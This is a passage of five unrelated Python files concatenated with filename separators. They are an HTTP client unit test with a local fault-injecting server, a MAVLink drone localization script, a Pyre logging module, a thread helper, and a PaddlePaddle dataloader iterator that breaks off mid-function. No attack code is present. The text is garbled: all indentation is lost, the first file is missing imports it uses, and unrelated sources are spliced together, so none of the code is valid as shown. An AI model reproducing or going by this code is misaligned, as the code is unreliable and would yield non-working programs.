from pykit import http
from pykit import ututil
dd = ututil.dd
HOST = '127.0.0.1'
PORT = 38002
KB = 1024
MB = (1024**2)
HOME_PATH = os.path.dirname(os.path.abspath(__file__))
class TestHttpClient(unittest.TestCase):
special_cases = {
'test_recving_server_close':
(0, 1, 'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n'),
'test_server_delay_response':
(0.5, 1, 'HTTP/1.1 200 OK\r\nContent-Length: 4\r\n\r\nabcd'),
'test_raise_chunked_size_error':
(0, 10, 'HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\nfoo\r\n'),
'test_raise_socket_timeout':
(3, 1, 'H'),
'test_raise_line_too_long_error':
(0, KB, 'a' * 65536),
'test_request_chunked':
(),
'test_readlines':
(0, 10, 'HTTP/1.1 200 OK\r\nContent-Length: 131086\r\n\r\n' + 'a'*65540 + '\r\nbb\r\n' + 'c'*65540),
'test_readlines_delimiter':
(0, 10, 'HTTP/1.1 200 OK\r\nContent-Length: 15\r\n\r\nabcd\rbcde\rcdef\r'),
}
request_headers = {}
request_body = {}
def test_raise_connnect_error(self):
h = http.Client(HOST, PORT)
self.assertRaises(http.NotConnectedError, h.send_body, None)
def test_raise_line_too_long_error(self):
h = http.Client(HOST, PORT)
self.assertRaises(http.LineTooLongError,
h.request, '/line_too_long')
def test_raise_response_headers_error(self):
cases = (
'/invalid_content_len',
'/invalid_header',
)
h = http.Client(HOST, PORT)
for uri in cases:
self.assertRaises(http.HeadersError, h.request, uri)
def test_raise_chunked_size_error(self):
h = http.Client(HOST, PORT)
h.request('')
self.assertRaises(http.ChunkedSizeError, h.read_body, 10)
def test_raise_response_not_ready_error(self):
h = http.Client(HOST, PORT)
self.assertRaises(http.ResponseNotReadyError, h.read_response)
def test_raise_socket_timeout(self):
h = http.Client(HOST, PORT, 2)
self.assertRaises(socket.timeout, h.request, '')
def test_raise_badstatus_line_error(self):
cases = (
'/invalid_line',
'/invalid_protocol',
'/<100',
'/>999',
)
h = http.Client(HOST, PORT)
for uri in cases:
self.assertRaises(http.BadStatusLineError, h.request, uri)
def test_raise_socket_error(self):
h = http.Client(HOST, PORT)
h.request('/socket_error')
self.assertRaises(socket.error, h.read_body, 10)
def test_get_http_request(self):
cases = (
('/get_1b', 1, 'a', (), False),
('/get_1b', 10, 'a', (), False),
('/get_1b', None, 'a', (), False),
('/get_10k', KB, 'bc' * 5 * KB, (), False),
('/get_10k', 20 * KB, 'bc' * 5 * KB, (), False),
('/get_10k', None, 'bc' * 5 * KB, (), False),
('/get_30m', 10 * MB, 'cde' * 10 * MB, (), False),
('/get_30m', 50 * MB, 'cde' * 10 * MB, (), False),
('/get_30m', None, 'cde' * 10 * MB, (), False),
('/get_10b_chunked', 1, 'f' * 10, (), True),
('/get_10b_chunked', 10, 'f' * 10, (), True),
('/get_10b_chunked', None, 'f' * 10, (), True),
('/get_10k_chunked', KB, 'gh' * 5 * KB, (), True),
('/get_10k_chunked', 20 * KB, 'gh' * 5 * KB, (), True),
('/get_10k_chunked', None, 'gh' * 5 * KB, (), True),
('/get_30m_chunked', 10 * MB, 'ijk' * 10 * MB, (), True),
('/get_30m_chunked', 50 * MB, 'ijk' * 10 * MB, (), True),
('/get_30m_chunked', None, 'ijk' * 10 * MB, (), True),
('/get_10b_range', 1, 'l' * 10, (2, 8), False),
('/get_10b_range', 10, 'l' * 10, (2, 8), False),
('/get_10b_range', None, 'l' * 10, (2, 8), False),
('/get_10k_range', KB, 'mn' * 5 * KB, (KB, 8 * KB), False),
('/get_10k_range', 20 * KB, 'mn' * 5 * KB, (KB, 8 * KB), False),
('/get_10k_range', None, 'mn' * 5 * KB, (KB, 8 * KB), False),
('/get_30m_range', 10 * MB, 'opq' * 10 * MB, (2 * MB, 25 * MB), False),
('/get_30m_range', 50 * MB, 'opq' * 10 * MB, (2 * MB, 25 * MB), False),
('/get_30m_range', None, 'opq' * 10 * MB, (2 * MB, 25 * MB), False),
)
h = http.Client(HOST, PORT)
for uri, each_read_size, expected_res, content_range, chunked in cases:
h.request(uri)
bufs = ''
if each_read_size is None:
bufs = h.read_body(None)
self.assertEqual(h.has_read, len(bufs))
else:
while True:
b = h.read_body(each_read_size)
if len(b) <= 0:
break
bufs += b
self.assertEqual(h.has_read, len(bufs))
start, end = 0, len(expected_res)
if len(content_range) >= 2:
start, end = content_range[0], content_range[1] + 1
self.assertEqual(expected_res[start:end], bufs)
self.assertEqual(None if chunked else len(bufs), h.content_length)
self.assertEqual(chunked, h.chunked)
def test_status(self):
cases = (
('/get_200', 200),
('/get_304', 304),
('/get_404', 404),
('/get_500', 500),
)
h = http.Client(HOST, PORT)
for uri, expected_status in cases:
h.request(uri)
self.assertEqual(expected_status, h.status)
def test_request_chunked(self):
h = http.Client(HOST, PORT)
h.send_request('', 'PUT', {'Transfer-Encoding': 'chunked'})
cases = (
('aaaaaaaaa', 100),
('bbbbbbbbbbbbbb', 100),
('0000000000000', 100),
('200_status', 200)
)
for body, status in cases:
h.send_body(body)
self.assertEqual(h.read_status(False), status)
def test_request_headers(self):
cases = (
('/header_1', {'host': 'example.com'}),
('/header_2', {'host': 'example.com', 'b': 'bar'}),
('/header_3', {'host': 'example.com', 'b': 'bar', 'f': 'foo'}),
)
h = http.Client(HOST, PORT)
for uri, headers in cases:
h.request(uri, headers=headers)
time.sleep(0.1)
self.assertEqual(headers, self.request_headers)
def test_response_headers(self):
cases = (
('/header_res1', {'f': 'foo'}),
('/header_res2', {'f': 'foo', 'b': 'bar'}),
('/header_res3', {'f': 'foo', 'b': 'bar', 't': 'too'}),
)
h = http.Client(HOST, PORT)
for uri, expected_headers in cases:
h.request(uri)
self.assertEqual(expected_headers, h.headers)
def test_send_body(self):
cases = (
('/put_1b', 'a', {'Content-Length': 1}),
('/put_10k', 'bc' * 5 * KB, {'Content-Length': 10 * KB}),
('/put_30m', 'cde' * 10 * MB, {'Content-Length': 30 * MB}),
)
h = http.Client(HOST, PORT)
for uri, body, headers in cases:
h.send_request(uri, method='PUT', headers=headers)
h.send_body(body)
h.read_response()
time.sleep(0.1)
self.assertEqual(body, self.request_body)
def test_readlines(self):
h = http.Client(HOST, PORT)
h.request('')
expected_body = ('a' * 65540 + '\r\n', 'bb\r\n', 'c' * 65540)
for idx, line in enumerate(h.readlines()):
self.assertEqual(expected_body[idx], line)
def test_readlines_delimiter(self):
h = http.Client(HOST, PORT)
h.request('')
expected_body = ('abcd\r', 'bcde\r', 'cdef\r')
for idx, line in enumerate(h.readlines('\r')):
self.assertEqual(expected_body[idx], line)
def test_recving_server_close(self):
h = http.Client(HOST, PORT, 3)
succ = False
try:
h.request('')
h.read_body(1024)
except socket.error as e:
dd(repr(e) + ' while recv server close')
succ = True
except Exception as e:
dd(repr(e) + ' unexpected exception')
self.assertTrue(succ)
def test_server_delay_response(self):
case = ({'content-length': '4'}, 'abcd')
expected_headers, expected_body = case
h = http.Client(HOST, PORT, 1)
h.request('')
body = h.read_body(1024)
self.assertEqual(expected_headers, h.headers)
self.assertEqual(expected_body, body)
def test_client_delay_send_data(self):
case = ('/client_delay', {'Content-Length': 10}, 'abcde' * 2)
uri, headers, body = case
h = http.Client(HOST, PORT, 3)
h.send_request(uri, method='PUT', headers=headers)
while len(body) > 0:
h.send_body(body[:1])
time.sleep(1)
body = body[1:]
self.assertEqual(case[2], self.request_body)
def test_garbage_collector(self):
h = http.Client(HOST, PORT)
h.request('/get_30m')
h.read_body(None)
del h
gc.collect()
self.assertListEqual([], gc.garbage)
def test_trace(self):
class FakeErrorDuringHTTP(Exception):
pass
h = http.Client(HOST, PORT)
h.request('/get_10k')
h.read_body(1)
h.read_body(None)
# emulate error
try:
with h.stopwatch.timer('exception'):
raise FakeErrorDuringHTTP(3)
except Exception:
pass
trace = h.get_trace()
dd('trace:', trace)
ks = (
'conn',
'send_header',
'recv_status',
'recv_header',
'recv_body',
)
for i, k in enumerate(ks):
self.assertEqual(k, trace[i]['name'])
self.assertEqual(type(0.1), type(trace[i]['time']))
names = [x['name'] for x in trace]
self.assertEqual(['conn',
'send_header',
'recv_status',
'recv_header',
'recv_body',
'recv_body',
'exception',
'pykit.http.Client'],
names)
dd('trace str:', h.get_trace_str())
def test_trace_min_tracing_milliseconds(self):
h = http.Client(HOST, PORT, stopwatch_kwargs={
'min_tracing_milliseconds': 1000})
h.request('/get_10k')
h.read_body(None)
# only steps cost time>1000 are traced. thus nothing should be traced
trace_str = h.get_trace_str()
dd('trace:', trace_str)
self.assertEqual('', trace_str)
self.assertEqual([], h.get_trace())
def test_https(self):
cases = (
('/get_1b', 'a'),
('/get_10k', 'bc' * 5 * KB),
('/get_30m', 'cde' * 10 * MB),
)
context = ssl._create_unverified_context()
cli = http.Client(HOST, PORT, https_context=context)
for uri, expected_res in cases:
cli.request(uri)
body = cli.read_body(None)
self.assertEqual(200, cli.status)
self.assertEqual(expected_res, body)
def __init__(self, *args, **kwargs):
super(TestHttpClient, self).__init__(*args, **kwargs)
self.server_thread = None
self.http_server = None
def setUp(self):
self.server_thread = threading.Thread(target=self._start_server)
self.server_thread.daemon = True
self.server_thread.start()
time.sleep(0.1)
def tearDown(self):
if self.http_server is not None:
self.http_server.shutdown()
self.http_server.server_close()
self.server_thread.join()
def _start_server(self):
if self._testMethodName in self.special_cases:
self._special_case_handle()
else:
addr = (HOST, PORT)
self.http_server = HTTPServer(addr, Handle)
if 'https' in self._testMethodName:
cert_file = os.path.join(HOME_PATH, 'test_https.pem')
self.http_server.socket = ssl.wrap_socket(self.http_server.socket,
certfile=cert_file,
server_side=True)
self.http_server.serve_forever()
def _special_case_handle(self):
addr = (HOST, PORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(addr)
sock.listen(10)
if self._testMethodName == 'test_request_chunked':
conn, _ = sock.accept()
for i in range(3):
data = conn.recv(1024)
dd('recv data:' + data)
res = 'HTTP/1.1 100 CONTINUE\r\n\r\n'
conn.sendall(res)
data = conn.recv(1024)
dd('recv data:' + data)
res = 'HTTP/1.1 200 OK\r\n\r\n'
conn.sendall(res)
else:
conn, _ = sock.accept()
data = conn.recv(1024)
dd('recv data:' + data)
res = self.special_cases.get(self._testMethodName)
if res is None:
return
sleep_time, each_send_size, content = res
try:
while len(content) > 0:
conn.sendall(content[:each_send_size])
content = content[each_send_size:]
time.sleep(sleep_time)
except socket.error as e:
dd(repr(e) + ' while response')
time.sleep(1)
conn.close()
sock.close()
class Handle(BaseHTTPRequestHandler):
all_responses = {
'/invalid_content_len': (200, {'content-length': 'abc'}, (0, '')),
'/invalid_header': (200, {}, (0, '')),
'/get_1b': (200, {'content-length': 1}, (1, 'a')),
'/get_10k': (200, {'content-length': 10 * KB}, (10240, 'bc' * 5 * KB)),
'/get_30m': (200, {'content-length': 30 * MB}, (10 * MB, 'cde' * 10 * MB)),
'/get_10b_chunked': (200, {'Transfer-Encoding': 'chunked'}, (5, 'f' * 10)),
'/get_10k_chunked': (200, {'Transfer-Encoding': 'chunked'}, (KB, 'gh' * 5 * KB)),
'/get_30m_chunked': (200, {'Transfer-Encoding': 'chunked'}, (10 * MB, 'ijk' * 10 * MB)),
'/get_10b_range': (206,
{'Content-Range': 'bytes %d-%d/%d' % (2, 8, 10),
'Content-Length': 7},
(5, 'l' * 10)),
'/get_10k_range': (206,
{'Content-Range': 'bytes %d-%d/%d' % (KB, 8 * KB, 10 * KB),
'Content-Length': 7 * KB + 1},
(KB, 'mn' * 5 * KB)),
'/get_30m_range': (206,
{'Content-Range': 'bytes %d-%d/%d' % (2 * MB, 25 * MB, 30 * MB),
'Content-Length': 23 * MB + 1},
(10 * MB, 'opq' * 10 * MB)),
'/get_200': (200, {}, (0, '')),
'/get_304': (304, {}, (0, '')),
'/get_404': (404, {}, (0, '')),
'/get_500': (500, {}, (0, '')),
'/header_1': (200, {}, (0, '')),
'/header_2': (200, {}, (0, '')),
'/header_3': (200, {}, (0, '')),
'/header_res1': (200, {'f': 'foo'}, (0, '')),
'/header_res2': (200, {'f': 'foo', 'b': 'bar'}, (0, '')),
'/header_res3': (200, {'f': 'foo', 'b': 'bar', 't': 'too'}, (0, '')),
'/invalid_line': (200, {}, (0, '')),
'/invalid_protocol': (200, {}, (0, '')),
'/<100': (10, {}, (0, '')),
'/>999': (1000, {}, (0, '')),
'/socket_error': (200, {'Content-Length': 10}, (0, '')),
}
def send_response(self, code, message=None):
self.log_request(code)
if message is None:
if code in self.responses:
message = self.responses[code][0]
else:
message = ''
if self.request_version != 'HTTP/0.9':
if self.path == '/invalid_protocol':
protocol = 'foo'
elif self.path == '/invalid_line':
self.wfile.write(self.protocol_version + '\r\n')
return
else:
protocol = self.protocol_version
self.wfile.write("%s %d %s\r\n" %
(protocol, code, message))
if self.path == '/invalid_header':
self.wfile.write('foo\r\n')
def do_PUT(self):
try:
length = int(self.headers.getheader('Content-Length'))
except (TypeError, ValueError) as e:
dd(repr(e))
return
read_bytes = 0
bufs = ''
try:
while read_bytes < length:
bufs += self.rfile.read(length - read_bytes)
read_bytes = len(bufs)
TestHttpClient.request_body = bufs
self.send_response(200)
self.send_header('Content-Length', 0)
self.end_headers()
except Exception as e:
dd(repr(e) + ' while parse put request')
def do_GET(self):
TestHttpClient.request_headers = self.headers.dict
res = self.all_responses.get(self.path)
if res is None:
dd('path error:' + self.path)
return
status, headers, body = res
try:
self.send_response(status)
for k, v in headers.items():
self.send_header(k, v)
self.end_headers()
self._send_body(headers, body)
except Exception as e:
dd(repr(e) + ' while parse get request')
def _send_body(self, headers, body):
each_send_size, data = self._get_body(headers, body)
ext = ';extname'
while len(data) > 0:
send_buf = data[:each_send_size]
if 'Transfer-Encoding' in headers:
if len(ext) > 0:
ext = ''
else:
ext = ';extname'
send_buf = '%x%s\r\n%s\r\n' % (len(send_buf), ext, send_buf)
self.wfile.write(send_buf)
data = data[each_send_size:]
if 'Transfer-Encoding' in headers:
self.wfile.write('0\r\n\r\n')
def _get_body(self, headers, body):
each_send_size, data = body
start = 0
end = len(data)
if 'Content-Range' in headers:
val = headers['Content-Range'][6:]
val = val[:val.find('/')]
start, end = val.split('-', 1)
return each_send_size, data[int(start):int(end) + 1]
|
localization_mode.py
|
#!/usr/bin/env python3
# Copyright 2020, NTRobotics
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pymavlink import mavutil
from pymavlink.mavutil import mavlink
import threading
import time
from utils import main_utils, param_utils
connection = None
need_reboot = False
def check_and_set_param(param, param_id, param_value):
global need_reboot
if param.param_id != param_id:
return
remote_value = param_utils.decode_param(param)
if isinstance(remote_value,int):
differ = (remote_value != param_value)
else:
differ = (abs(remote_value - param_value) > 0.001)
if differ:
param_utils.set_parameter(connection, param_id, param_value)
need_reboot = True
stamp_offset_ms = None
def send_attitude():
global stamp_offset_ms
while True:
stamp = int(time.time() * 1000) + stamp_offset_ms
connection.mav.attitude_send(stamp, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
time.sleep(0.05)
if __name__ == '__main__':
connection = main_utils.connect()
main_utils.start_sending_heartbeat(connection)
connection.wait_heartbeat()
params = param_utils.list_params(connection)
for p in params:
print('Param %s = %3.6f' % (p.param_id, p.param_value))
check_and_set_param(p, 'SAVE_MAP', 1)
check_and_set_param(p, 'LOAD_MAP', 1)
check_and_set_param(p, 'MAP_ID', 7)
check_and_set_param(p, 'SEND_ORIGIN', 0)
check_and_set_param(p, 'INIT_ALT', 1.0)
if need_reboot:
print('Parameters was changed. Rebooting, please wait...')
main_utils.reboot(connection)
main_utils.stop_sending_heartbeat(connection)
del connection
time.sleep(5)
connection = main_utils.connect()
main_utils.start_sending_heartbeat(connection)
connection.wait_heartbeat()
print('Got heartbeat.')
sys_time_msg = connection.recv_match(type='SYSTEM_TIME', blocking=True)
now_us = int(time.time() * 1e6)
time_diff_us = sys_time_msg.time_unix_usec - now_us
boot_offset_us = sys_time_msg.time_boot_ms * 1000 - sys_time_msg.time_unix_usec
stamp_offset_ms = int((time_diff_us + boot_offset_us) / 1000)
print('Stamp offset is %d ms' % stamp_offset_ms)
attitude_thread = threading.Thread(target=send_attitude, daemon=True)
attitude_thread.start()
main_utils.send_command(
connection,
mavlink.MAV_CMD_SET_MESSAGE_INTERVAL,
param1=float(mavlink.MAVLINK_MSG_ID_GLOBAL_POSITION_INT),
param2=1e6
)
print('Press Ctrl-C to terminate receiving global position messages.')
try:
while True:
msg = connection.recv_match(type=['HEARTBEAT', 'GLOBAL_POSITION_INT', 'STATUSTEXT'], blocking=True)
if msg.get_type() == 'HEARTBEAT':
old_state = msg.system_status
if msg.system_status == mavlink.MAV_STATE_EMERGENCY:
print("*** NO COORDINATES ***")
elif msg.system_status == mavlink.MAV_STATE_CRITICAL:
print("*** ONLY ALTITUDE ***")
elif msg.system_status == mavlink.MAV_STATE_STANDBY:
print("*** FULL COORDINATES ***")
else:
print("*** UNEXPECTED SYSTEM STATUS (%d) ***" % msg.system_status)
elif msg.get_type() == 'GLOBAL_POSITION_INT':
print('Global Position message received (ms,lat,lon,alt,rel_alt,vx,vy,vz,hdg): %d, %.5f, %.5f, %.3f,'
' %.3f, %.3f, %.3f, %.3f, %3.3f' %
(msg.time_boot_ms, msg.lat, msg.lon, msg.alt, msg.relative_alt, msg.vx, msg.vy, msg.vz, msg.hdg)
)
elif msg.get_type() == 'STATUSTEXT':
main_utils.handle_statustext(connection, msg)
else:
print('Unexpected message %s' % msg.get_type())
except KeyboardInterrupt:
exit(0)
|
log.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import io
import logging
import os
import re
import sys
import threading
import time
from typing import List # noqa
LOG = logging.getLogger(__name__)
PERFORMANCE = 15
PROMPT = 50
SUCCESS = 60
stdout = io.StringIO(newline="")
class Color:
YELLOW = "\033[33m"
RED = "\033[31m"
class Format:
BOLD = "\033[1m"
CLEAR_LINE = "\x1b[0G\x1b[K"
CLEAR = "\033[0m"
TRUNCATE_OVERFLOW = "\033[?7l"
WRAP_OVERFLOW = "\033[?7h"
NEWLINE = "\n"
CURSOR_UP_LINE = "\x1b[1A"
HIDE_CURSOR = "\x1b[?25l"
SHOW_CURSOR = "\x1b[?25h"
class Character:
LAMBDA = "ƛ"
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__("%(asctime)s %(levelname)s %(message)s")
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD = 0.5
LINE_BREAKING_LEVELS = ["ERROR", "WARNING", "SUCCESS"]
_terminate = False # type: bool
_last_update = 0.0 # type: float
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator = ""
self.setLevel(logging.INFO)
self._record = None
self._last_record = None
self._active_lines = 0
# Preamble preparing terminal.
sys.stderr.write(
Format.NEWLINE
+ Format.TRUNCATE_OVERFLOW
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record, age=None) -> None:
self._last_record = record
suffix = ""
color = ""
active_lines = record.msg.count("\n") + 1
if record.levelname in self.LINE_BREAKING_LEVELS:
record.msg += "\n"
if record.levelname == "ERROR":
color = Color.RED
self._record = None
active_lines = 0
elif record.levelname == "WARNING":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "PROMPT":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
elif age:
if age > 10:
color = Color.YELLOW
if age > 30:
color = Color.RED
suffix = " {}[{:.1f}s]{}".format(
color if color else "", age, Format.CLEAR if color else ""
)
else:
self._record = record
self._last_update = time.time()
timed_record = copy.copy(record)
timed_record.msg = (
"{clear_line}{color} {cursor}{clear} " "{message}{suffix}"
).format(
clear_line=self.clear_lines(),
color=color,
cursor=Character.LAMBDA,
clear=Format.CLEAR,
message=record.msg,
suffix=suffix,
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
if self._record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(self._record, age)
time.sleep(0.1)
def terminate(self) -> None:
last_record = self._last_record
if last_record and last_record.levelname not in self.LINE_BREAKING_LEVELS:
sys.stderr.write("\n")
# Reset terminal.
sys.stderr.write(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR)
sys.stderr.flush()
self._terminate = True
def initialize(arguments) -> None:
if arguments.noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
arguments.timed_stream_handler = None
else:
stream_handler = TimedStreamHandler()
arguments.timed_stream_handler = stream_handler
handlers = [stream_handler] # type: List[logging.Handler]
if not arguments.noninteractive:
try:
os.mkdir(".pyre")
except FileExistsError:
pass
file_handler = logging.FileHandler(".pyre/pyre.stderr")
file_handler.setFormatter(SectionFormatter())
file_handler.setLevel(logging.DEBUG)
# pyre-ignore[6]: T31515857
handlers.append(file_handler)
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=handlers)
def cleanup(arguments) -> None:
if arguments.timed_stream_handler:
arguments.timed_stream_handler.terminate()
output = stdout.getvalue()
if output:
sys.stdout.write(output + "\n")
class Buffer:
THRESHOLD = 0.1
_flushed = False # type: bool
def __init__(self, section, data) -> None:
self._section = section
self._data = data
self._lock = threading.RLock()
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def append(self, line) -> None:
self._data.append(line)
def flush(self) -> None:
with self._lock:
if self._flushed is True:
return
self._flushed = True
message = "\n".join(self._data)
if self._section == "ERROR":
LOG.error(message)
elif self._section == "INFO":
LOG.info(message)
elif self._section == "WARNING":
LOG.warning(message)
elif self._section == "PROGRESS":
LOG.info(message)
elif self._section == "PARSER":
LOG.error(message)
else:
LOG.debug("[%s] %s", self._section, message)
def _thread(self) -> None:
time.sleep(self.THRESHOLD)
with self._lock:
if not self._flushed:
self.flush()
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
|
multithreading.py
|
def new_thread(function, *args, **kwargs):
"""
launches the input 'function' in a separate thread with daemon == True.
Explanation: Some threads do background tasks, like sending keepalive packets, or performing periodic garbage collection, or whatever. These are only useful when the main program is running, and it's okay to kill them off once the other, non-daemon, threads have exited.
Without daemon threads, you'd have to keep track of them, and tell them to exit, before your program can completely quit. By setting them as daemon threads, you can let them run and forget about them, and when your program quits, any daemon threads are killed automatically.
@Chris Jester-Young https://stackoverflow.com/a/190017/8436767
Parameters
----------
function:
function object
*args:
iterable of arguments
**kwargs:
dictionary of keywords
daemon:
flag, if the thread is daemon(True) or not(False).
Returns
-------
thread:
thread object
Examples
--------
the example of usage
>>> def func(*args,**kwargs):
print('keywords',kwargs)
print('args',args)
from time import time,sleep
t1 = time()
sleep(args[0])
t2 = time()
print('this thread slept for {} seconds'.format(t2-t1))
print('input parameters: args = {}, kwargs = {!r}'.format(args[0],kwargs['keyword']))
>>> new_thread(func, 1, keyword = 'this is key 1 value')
this thread slept for 1.002244234085083 seconds
input parameters: args = 1, kwargs = 'keywords argument'
"""
from threading import Thread
thread = Thread(target=function, args = args, kwargs = kwargs)
try:
daemon = kwargs['daemon']
except:
daemon = True
thread.daemon = daemon
thread.start()
return thread
def start_new_safe_thread(function, daemon = True, *args , **kwargs):
"""
alias for new_thread for back compatibility
"""
import warnings
warnings.warn(
"start_new_safe_thread will be deprecated in version 0.0.7, use new_thread instead",
PendingDeprecationWarning
)
return new_thread(function, args , kwargs)
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
from paddle.fluid.framework import _set_expected_place, _current_expected_place
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode
from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
from .batch_sampler import _InfiniteIterableSampler
from .collate import default_collate_fn, default_convert_fn
from .worker import ParentWatchDog, get_worker_info, _worker_loop, \
_DatasetKind, _IterableDatasetStopIteration, _WorkerException
from .flat import _flatten_batch, _restore_batch
__all__ = ['get_worker_info']
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._auto_collate_batch = loader.auto_collate_batch
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
if self._auto_collate_batch:
self._sampler_iter = iter(loader.batch_sampler)
self._collate_fn = loader.collate_fn or default_collate_fn
else:
if self._dataset_kind == _DatasetKind.MAP:
self._sampler_iter = iter(list(range(len(self._dataset))))
else:
self._sampler_iter = iter(
_InfiniteIterableSampler(self._dataset, 1))
self._collate_fn = loader.collate_fn or default_convert_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be get from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single process implement of DataLoaderIter, loading data from
loader.data in main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._auto_collate_batch,
self._collate_fn, True)
# NOTE: _structrue_infos used to record the data structure of
# batch to restore batch structure after reading Tensor
# from blocking_queue in single-process mode. Note that
# only single process is used in single-process mode, we
# can record the data structure sequencely in a list without
# recording the send and recv index
self._structure_infos = []
# NOTE: len(self._places) batch data compose as an output
# iteration, set blocking_queue can cache 2 iteration datas
# at most here
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _thread_loop(self, legacy_expected_place):
try:
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices)
# flat batch and record structure infos
batch, structure = _flatten_batch(batch)
self._structure_infos.append(structure)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except StopIteration:
self._blocking_queue.close()
except Exception:
